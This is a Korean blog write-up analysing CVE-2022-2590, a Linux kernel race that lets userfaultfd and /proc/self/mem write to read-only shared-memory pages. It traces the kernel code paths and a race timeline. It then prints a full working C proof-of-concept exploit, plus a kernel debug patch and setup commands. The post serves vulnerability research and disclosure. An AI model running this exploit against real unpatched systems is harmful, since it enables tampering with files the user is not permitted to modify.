일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
- got overwrite
- webhacking
- hacking
- WEB
- CTF
- 웹해킹
- 해킹
- ctf player
- dreamhack
- hacking game
- 워게임
- cryptography
- crypto
- Wreckctf
- webhacking.kr
- KAIST
- writeup
- python
- Buffer Overflow
- 2022 Fall GoN Open Qual CTF
- Gon
- Wargame
- System Hacking
- h4cking game
- TeamH4C
- deayzl
- reversing
- hack
- pwnable
- christmas ctf
- Today
- Total
deayzl's blog
[Linux kernel] CVE-2022-2590, 공유 메모리에 한정된 Dirty COW 본문
[Linux kernel] CVE-2022-2590, 공유 메모리에 한정된 Dirty COW
deayzl 2024. 7. 31. 00:35English version of this document is in https://github.com/hyeonjun17/CVE-2022-2590-analysis
분석 및 테스트 버전: Linux/x86 6.0.0-rc1 (commit 37887783b3fef877bf34b8992c9199864da4afcb)
Introduction:
UFFDIO_CONTINUE를 이용하여 can_follow_write_pte 함수 내의 FOLL_FORCE와 FOLL_COW, pte_dirty 조건을 모두 만족시킴으로써 read-only 공유 메모리 페이지에 임의 내용 쓰기가 가능한 취약점이다.
Analysis:
/*
* FOLL_FORCE can write to even unwritable pte's, but only
* after we've gone through a COW cycle and they are dirty.
*/
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
{
return pte_write(pte) ||
((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}
위 함수는 write 행위를 수행할 pte를 찾는 과정에서 해당 pte에 write가 가능한지를 판단한다.
다음 조건 중 하나를 만족하면 write가 가능한 pte라고 결정한다.
1. pte의 플래그에서 writable 하다는 정보가 있다.
2. 변수 flags에 FOLL_FORCE, FOLL_COW 플래그가 존재하며 pte의 플래그에서 dirty하다는 정보를 확인한다.
2번 조건을 만족시키기 위해 3가지의 flag를 설정하는 방법은 다음과 같다.
1. FOLL_FORCE
static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)
{
...
flags = FOLL_FORCE | (write ? FOLL_WRITE : 0);
while (count > 0) {
size_t this_len = min_t(size_t, count, PAGE_SIZE);
if (write && copy_from_user(page, buf, this_len)) {
copied = -EFAULT;
break;
}
this_len = access_remote_vm(mm, addr, page, this_len, flags); // __get_user_pages with FOLL_FORCE on
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}
...
}
위 함수는 /proc/<pid>/mem에 대한 read/write를 수행하는 함수이다.
위 함수를 통해 write를 수행하면 FOLL_FORCE 플래그를 가진채로 __get_user_pages 함수에 도달할 수 있다.
FOLL_FORCE는 본래 ptrace에서 사용되는 플래그이나 다음 commit에서 이에 대한 필요성을 확인할 수 있다.
https://github.com/torvalds/linux/commit/f511c0b17b081562dca8ac5061dfa86db4c66cc2
2. FOLL_COW
/*
* mmap_lock must be held on entry. If @locked != NULL and *@flags
* does not include FOLL_NOWAIT, the mmap_lock may be released. If it
* is, *@locked will be set to 0 and -EBUSY returned.
*/
static int faultin_page(struct vm_area_struct *vma,
unsigned long address, unsigned int *flags, bool unshare,
int *locked)
{
...
/*
* The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
* necessary, even if maybe_mkwrite decided not to set pte_write. We
* can thus safely do subsequent page lookups as if they were reads.
* But only do so when looping for pte_write is futile: in some cases
* userspace may also be wanting to write to the gotten user page,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags |= FOLL_COW;
return 0;
}
Dirty COW 취약점의 패치 중 한 부분인, faultin_page 함수 내의 FOLL_COW or연산을 이용한다.
static long __get_user_pages(struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *locked)
{
...
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (fatal_signal_pending(current)) {
ret = -EINTR;
goto out;
}
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &ctx); // can_follow_write_pte
if (!page || PTR_ERR(page) == -EMLINK) {
ret = faultin_page(vma, start, &foll_flags,
PTR_ERR(page) == -EMLINK, locked); // flags |= FOLL_COW
switch (ret) {
case 0:
goto retry; // try follow page again
case -EBUSY:
case -EAGAIN:
ret = 0;
fallthrough;
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
goto out;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
...
}
__get_user_pages 함수 내에서 faultin_page 함수를 호출하고 retry 레이블로 다시 향하도록 해야 FOLL_COW 플래그를 가진채로 can_follow_write_pte 함수에 도달할 수 있다.
3. pte_dirty
이 조건은 다음 commit으로 인해 만족할 수 있다.
https://github.com/torvalds/linux/commit/9ae0f87d009ca6c4aab2882641ddfc319727e3db
/*
* Install PTEs, to map dst_addr (within dst_vma) to page.
*
* This function handles both MCOPY_ATOMIC_NORMAL and _CONTINUE for both shmem
* and anon, and for both shared and private VMAs.
*/
int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
struct vm_area_struct *dst_vma,
unsigned long dst_addr, struct page *page,
bool newly_allocated, bool wp_copy)
{
...
_dst_pte = mk_pte(page, dst_vma->vm_page_prot);
_dst_pte = pte_mkdirty(_dst_pte); // set pte dirty unconditionally
if (page_in_cache && !vm_shared)
writable = false;
...
}
위 패치로 인해 read-only인 공유 메모리 페이지에 대한 pte를 조건없이 dirty한 상태로 설치가 가능하다.
위 3가지의 플래그를 만족시켰다면 can_follow_write_pte 함수는 true를 반환할 것이고
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags,
struct dev_pagemap **pgmap)
{
...
// true && !true == false
if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags)) {
pte_unmap_unlock(ptep, ptl);
return NULL;
}
page = vm_normal_page(vma, address, pte); // get read-only shared memory page
...
out:
pte_unmap_unlock(ptep, ptl);
return page;
no_page:
pte_unmap_unlock(ptep, ptl);
if (!pte_none(pte))
return NULL;
return no_page_table(vma, flags);
}
read-only 공유 메모리 페이지를 가져올 수 있다.
Race Scenario:
다음은 이후에 다루게 될 PoC로 증명된 race scenario이다.
madvise and read | UFFDIO_CONTINUE ioctl | pwrite |
madvise // zap the page | ||
shmem_fault // read fault | ||
handle_userfault | ||
userfaultfd_continue | ||
mcontinue_atomic_pte | ||
ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page | ||
mfill_atomic_install_pte | ||
_dst_pte = pte_mkdirty(_dst_pte); // make pte dirty | ||
set_pte_at(dst_mm, dst_addr, dst_pte, _dst_pte); // install pte | mem_rw | |
access_remote_vm // with FOLL_FORCE | ||
__get_user_pages | ||
can_follow_write_pte // no FOLL_COW, return 0 | ||
faultin_page | ||
flags |= FOLL_COW | ||
retry: | ||
madvise // zap the page | follow_page_pte | |
shmem_fault // read fault | ||
handle_userfault | ||
userfaultfd_continue | ||
mcontinue_atomic_pte | ||
ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC); // get page | ||
mfill_atomic_install_pte | ||
_dst_pte = pte_mkdirty(_dst_pte); // make pte dirty | ||
can_follow_write_pte // return 1 | ||
copy_to_user(buf, page, this_len) // write content to read-only page |
madvise and read 루틴이 2번 실행되는데, 첫번째 실행은 __get_user_pages의 retry를 유도하고 두번째 실행은 dirty로 만든 pte를 가리키도록 유도하는 역할을 수행한다.
PoC and Patch:
https://www.openwall.com/lists/oss-security/2022/08/15/1
위 링크에서 David Hildenbrand의 reproducer를 확인할 수 있다.
그러나 위 reproducer는 정확한 race scenario를 도출하기 힘들기에 최대한 선형적인 실행을 선호하도록 reproducer를 수정하였고 그에 따라 linux kernel 소스코드 또한 수정하였다.
.config:
...
CONFIG_USERFAULTFD=y
CONFIG_HAVE_ARCH_USERFAULTFD_WP=y
CONFIG_HAVE_ARCH_USERFAULTFD_MINOR=y
...
PoC:
/*
*
* modified reproducer by deayzl (originally from David Hildenbrand <david@redhat.com>)
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <poll.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <linux/prctl.h>
#include <sys/prctl.h>
#define UFFD_FEATURE_MINOR_SHMEM (1<<10)
#define UFFDIO_REGISTER_MODE_MINOR ((__u64)1<<2)
#define UFFD_USER_MODE_ONLY 1
#define _UFFDIO_CONTINUE (0x07)
#define UFFDIO_CONTINUE _IOWR(UFFDIO, _UFFDIO_CONTINUE, \
struct uffdio_continue)
struct uffdio_continue {
struct uffdio_range range;
#define UFFDIO_CONTINUE_MODE_DONTWAKE ((__u64)1<<0)
__u64 mode;
/*
* Fields below here are written by the ioctl and must be at the end:
* the copy_from_user will not read past here.
*/
__s64 mapped;
};
int mem_fd;
void *map;
int uffd;
char str[] = "AAAA";
void *write_thread_fn(void *arg)
{
prctl(PR_SET_NAME, "pwrite");
pwrite(mem_fd, str, strlen(str), (uintptr_t) map);
}
static void *uffd_thread_fn(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
struct uffdio_continue uffdio;
struct uffdio_range uffdio_wake;
ssize_t nread;
prctl(PR_SET_NAME, "uffd");
while (1) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1) {
fprintf(stderr, "poll() failed: %d\n", errno);
exit(1);
}
nread = read(uffd, &msg, sizeof(msg));
if (nread <= 0)
continue;
uffdio.range.start = (unsigned long) map;
uffdio.range.len = 4096;
uffdio.mode = 0;
if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) {
if (errno == EEXIST) {
uffdio_wake.start = (unsigned long) map;
uffdio_wake.len = 4096;
if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) {
}
} else {
fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno);
}
}
}
}
static int setup_uffd(void)
{
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
uffd = syscall(__NR_userfaultfd,
O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
if (uffd < 0) {
fprintf(stderr, "syscall(__NR_userfaultfd) failed: %d\n", errno);
return -errno;
}
uffdio_api.api = UFFD_API;
uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
fprintf(stderr, "UFFDIO_API failed: %d\n", errno);
return -errno;
}
if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) {
fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n");
return -ENOSYS;
}
uffdio_register.range.start = (unsigned long) map;
uffdio_register.range.len = 4096;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", errno);
return -errno;
}
return 0;
}
static void print_content(int fd)
{
ssize_t ret;
char buf[80];
int offs = 0;
while (1) {
ret = pread(fd, buf, sizeof(buf) - 1, offs);
if (ret > 0) {
buf[ret] = 0;
printf("%s", buf);
offs += ret;
} else if (!ret) {
break;
} else {
fprintf(stderr, "pread() failed: %d\n", errno);
}
}
printf("\n");
}
int main(int argc, char *argv[])
{
pthread_t thread1, thread2;
int fd;
if (argc == 2) {
fd = open(argv[1], O_RDONLY);
if (fd < 0) {
fprintf(stderr, "open() failed: %d\n", errno);
return 1;
}
} else {
fprintf(stderr, "usage: %s target_file\n", argv[0]);
return 1;
}
mem_fd = open("/proc/self/mem", O_RDWR);
if (mem_fd < 0) {
fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno);
return 1;
}
map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd ,0);
if (map == MAP_FAILED) {
fprintf(stderr, "mmap() failed: %d\n", errno);
return 1;
}
if (setup_uffd())
return 1;
printf("Old content: \n");
print_content(fd);
int ret;
int tmp;
pthread_create(&thread1, NULL, uffd_thread_fn, NULL);
prctl(PR_SET_NAME, "madvise");
ret = madvise(map, 4096, MADV_DONTNEED);
if (ret < 0) {
fprintf(stderr, "madvise() failed: %d\n", errno);
exit(1);
}
tmp = *((int *)map);
pthread_create(&thread2, NULL, write_thread_fn, NULL);
sleep(0.3);
prctl(PR_SET_NAME, "madvise");
ret = madvise(map, 4096, MADV_DONTNEED);
if (ret < 0) {
fprintf(stderr, "madvise() failed: %d\n", errno);
exit(1);
}
tmp = *((int *)map);
sleep(5);
printf("New content: \n");
print_content(fd);
return 0;
}
Patch:
diff --git a/Makefile b/Makefile
index f09673b6c11d..cd952e1b49f0 100644
--- a/Makefile
+++ b/Makefile
@@ -789,7 +789,8 @@ stackp-flags-$(CONFIG_STACKPROTECTOR_STRONG) := -fstack-protector-strong
KBUILD_CFLAGS += $(stackp-flags-y)
KBUILD_CFLAGS-$(CONFIG_WERROR) += -Werror
-KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+# KBUILD_CFLAGS-$(CONFIG_CC_NO_ARRAY_BOUNDS) += -Wno-array-bounds
+KBUILD_CFLAGS += -Wno-array-bounds -Wno-format
KBUILD_CFLAGS += $(KBUILD_CFLAGS-y) $(CONFIG_CC_IMPLICIT_FALLTHROUGH)
ifdef CONFIG_CC_IS_CLANG
diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
index 1c44bf75f916..004f7c391903 100644
--- a/fs/userfaultfd.c
+++ b/fs/userfaultfd.c
@@ -1450,7 +1450,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
* the current one has not been updated yet.
*/
vma->vm_flags = new_flags;
- vma->vm_userfaultfd_ctx.ctx = ctx;
+ vma->vm_userfaultfd_ctx.ctx = ctx;if((new_flags&VM_UFFD_MINOR)!=0){printk(KERN_ALERT "[userfaultfd_register] uffd registered at vma: 0x%lx as UFFDIO_REGISTER_MODE_MINOR (ctx: 0x%lx)\n", (unsigned long)vma, (unsigned long)ctx);}
if (is_vm_hugetlb_page(vma) && uffd_disable_huge_pmd_share(vma))
hugetlb_unshare_all_pmds(vma);
diff --git a/mm/gup.c b/mm/gup.c
index 732825157430..1f3a4a0c67b3 100644
--- a/mm/gup.c
+++ b/mm/gup.c
@@ -483,11 +483,11 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
* after we've gone through a COW cycle and they are dirty.
*/
static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
-{
+{if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[can_follow_write_pte/%s] res: %d(%d && %d && %d) (pte=0x%lx)\n", current->comm, pte_write(pte) || ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte)), flags & FOLL_FORCE, flags & FOLL_COW, pte_dirty(pte), pte_val(pte));}
return pte_write(pte) ||
((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
}
-
+bool do_ssleep=false;
static struct page *follow_page_pte(struct vm_area_struct *vma,
unsigned long address, pmd_t *pmd, unsigned int flags,
struct dev_pagemap **pgmap)
@@ -505,7 +505,7 @@ static struct page *follow_page_pte(struct vm_area_struct *vma,
retry:
if (unlikely(pmd_bad(*pmd)))
return no_page_table(vma, flags);
-
+ if(do_ssleep && !strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[follow_page_pte/%s] before ssleep 1\n", current->comm);schedule_timeout_interruptible(3 * HZ);printk(KERN_ALERT "[follow_page_pte/%s] after ssleep 1\n", current->comm);do_ssleep=false;}
ptep = pte_offset_map_lock(mm, pmd, address, &ptl);
pte = *ptep;
if (!pte_present(pte)) {
@@ -995,6 +995,7 @@ static int faultin_page(struct vm_area_struct *vma,
* which a read fault here might prevent (a readonly page might get
* reCOWed by userspace write).
*/
+ if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[faultin_page/%s] if %d && %d, set flags FOLL_COW\n", current->comm, (ret & VM_FAULT_WRITE), !(vma->vm_flags & VM_WRITE));do_ssleep=true;}
if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
*flags |= FOLL_COW;
return 0;
@@ -1190,10 +1191,10 @@ static long __get_user_pages(struct mm_struct *mm,
}
cond_resched();
- page = follow_page_mask(vma, start, foll_flags, &ctx);
+ page = follow_page_mask(vma, start, foll_flags, &ctx);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] page: 0x%lx\n", current->comm, (unsigned long)page);}
if (!page || PTR_ERR(page) == -EMLINK) {
ret = faultin_page(vma, start, &foll_flags,
- PTR_ERR(page) == -EMLINK, locked);
+ PTR_ERR(page) == -EMLINK, locked);if(!strcmp(current->comm, "pwrite")){printk(KERN_ALERT "[__get_user_pages/%s] faultin_page returns %d\n", current->comm, ret);}
switch (ret) {
case 0:
goto retry;
diff --git a/mm/memory.c b/mm/memory.c
index 4ba73f5aa8bb..de3ffc8ff3ab 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -4654,7 +4654,7 @@ static vm_fault_t do_fault(struct vm_fault *vmf)
if (vmf->prealloc_pte) {
pte_free(vm_mm, vmf->prealloc_pte);
vmf->prealloc_pte = NULL;
- }
+ }if(!strcmp(current->comm, "madvise")){unsigned long tmp = vmf->pte != 0 ? pte_val(*vmf->pte) : 0;printk(KERN_ALERT "[do_fault/%s] after do_read_fault, vmf->pte: 0x%lx\n", current->comm, tmp);}
return ret;
}
diff --git a/mm/shmem.c b/mm/shmem.c
index 5783f11351bb..370333c7fb13 100644
--- a/mm/shmem.c
+++ b/mm/shmem.c
@@ -1554,7 +1554,7 @@ static struct folio *shmem_alloc_folio(gfp_t gfp,
struct folio *folio;
shmem_pseudo_vma_init(&pvma, info, index);
- folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);
+ folio = vma_alloc_folio(gfp, 0, &pvma, 0, false);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_alloc_folio/%s] vma_alloc_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
shmem_pseudo_vma_destroy(&pvma);
return folio;
@@ -1855,13 +1855,13 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
sbinfo = SHMEM_SB(inode->i_sb);
charge_mm = vma ? vma->vm_mm : NULL;
- folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);
+ folio = __filemap_get_folio(mapping, index, FGP_ENTRY | FGP_LOCK, 0);//if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] __filemap_get_folio returns folio: 0x%lx\n", current->comm, (unsigned long)folio);}
if (folio && vma && userfaultfd_minor(vma)) {
if (!xa_is_value(folio)) {
folio_unlock(folio);
folio_put(folio);
- }
- *fault_type = handle_userfault(vmf, VM_UFFD_MINOR);
+ }if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault starts\n", current->comm);}
+ *fault_type = handle_userfault(vmf, VM_UFFD_MINOR);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] handle_userfault ends\n", current->comm);}
return 0;
}
@@ -2013,7 +2013,7 @@ static int shmem_getpage_gfp(struct inode *inode, pgoff_t index,
goto unlock;
}
out:
- *pagep = folio_page(folio, index - hindex);
+ *pagep = folio_page(folio, index - hindex);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[shmem_getpage_gfp/%s] folio_page returns page: 0x%lx\n", current->comm, (unsigned long)*pagep);}
return 0;
/*
@@ -2123,7 +2123,7 @@ static vm_fault_t shmem_fault(struct vm_fault *vmf)
}
err = shmem_getpage_gfp(inode, vmf->pgoff, &vmf->page, SGP_CACHE,
- gfp, vma, vmf, &ret);
+ gfp, vma, vmf, &ret);if(!strcmp(current->comm, "madvise")){printk(KERN_ALERT "[shmem_fault/%s] shmem_getpage_gfp(page=0x%lx) returns %d\n", current->comm, (unsigned long)vmf->page, err);}
if (err)
return vmf_error(err);
return ret;
diff --git a/mm/userfaultfd.c b/mm/userfaultfd.c
index 07d3befc80e4..29acbe56bf2c 100644
--- a/mm/userfaultfd.c
+++ b/mm/userfaultfd.c
@@ -70,7 +70,7 @@ int mfill_atomic_install_pte(struct mm_struct *dst_mm, pmd_t *dst_pmd,
pgoff_t offset, max_off;
_dst_pte = mk_pte(page, dst_vma->vm_page_prot);
- _dst_pte = pte_mkdirty(_dst_pte);
+ _dst_pte = pte_mkdirty(_dst_pte);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mfill_atomic_install_pte/%s] pte_mkdirty(page=0x%lx) (pte: 0x%lx)\n", current->comm, (unsigned long)page, pte_val(_dst_pte));}
if (page_in_cache && !vm_shared)
writable = false;
@@ -246,7 +246,7 @@ static int mcontinue_atomic_pte(struct mm_struct *dst_mm,
struct page *page;
int ret;
- ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);
+ ret = shmem_getpage(inode, pgoff, &page, SGP_NOALLOC);if(!strcmp(current->comm, "uffd")){printk(KERN_ALERT "[mcontinue_atomic_pte/%s] shmem_getpage returns page: 0x%lx\n", current->comm, (unsigned long)page);}
/* Our caller expects us to return -EFAULT if we failed to find page. */
if (ret == -ENOENT)
ret = -EFAULT;
테스트를 위해 다음과 같은 사전작업을 진행한다.
(david의 reproducer에는 /tmp/foo로 설명되어 있지만 tmpfs는 현 버전에서 공유 메모리가 아니기에 userfaultfd register에 실패한다)
sudo -s
echo "asdf" > /dev/shm/foo
chmod 0404 /dev/shm/foo
exit
이후 poc를 실행하게 되면 다음과 같은 화면을 볼 수 있다.
references:
commit: https://github.com/torvalds/linux/commit/5535be3099717646781ce1540cf725965d680e7b
lore.kernel patch v1: https://lore.kernel.org/linux-mm/20220808073232.8808-1-david@redhat.com/#r
lore.kernel patch v2: https://lore.kernel.org/all/20220809205640.70916-1-david@redhat.com/T/#u
openwall: https://www.openwall.com/lists/oss-security/2022/08/08/1
openwall2: https://lists.openwall.net/linux-kernel/2022/08/08/418